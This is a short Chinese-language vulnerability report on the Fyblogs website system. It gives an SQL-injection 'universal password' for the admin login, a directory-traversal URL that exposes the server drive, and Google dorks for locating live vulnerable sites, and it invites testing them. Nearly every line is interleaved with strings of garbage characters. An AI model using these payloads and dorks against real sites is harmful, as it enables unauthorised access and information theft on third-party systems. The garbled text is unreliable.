漏洞类型: 未授权访问/权限绕过
+ R0 W/ G/ L( C3 E. c! p# q# n H* Z+ W0 G; y
简要描述:
$ K2 A- J) ` u8 G C$ K* u) j$ n. V( \6 T; j! M
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
2 B1 {( X$ H3 @% K: s5 e( a
2 S! m; ]- W; u详细说明:2 m9 y7 j# x* b3 N% }0 b: m" v
D+ G, i# v# |后台万能密码 'or'='or'
& C% o* x# J* |/ e6 U" ~4 P( s后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!: J0 Y) L- K: h- I6 a: B/ v. C& Q; p
admin/uploadfile.asp?currentFolder=/upfiles/../
1 O0 c$ o; Y# P+ D) S1 s# Z
- Q6 }. V i8 z* B& }, Y漏洞证明:7 @; Y. y$ ~: ~! I7 l" [- B
5 W2 A/ N4 l0 G( o- v/ |谷歌:inurl:type.asp?id=1 新闻中心
; Q6 _/ N0 g' q& }或者 :inurl:download_ok.asp?
: R9 W' G& z6 J- A4 G5 }
z5 d$ S, b0 s6 ~3 ]可以测试
: s; j, ^7 |- N8 F5 g2 z0 ^0 X2 b! { I/ f
, p' U0 d* k. ]8 s1 D; N% K
|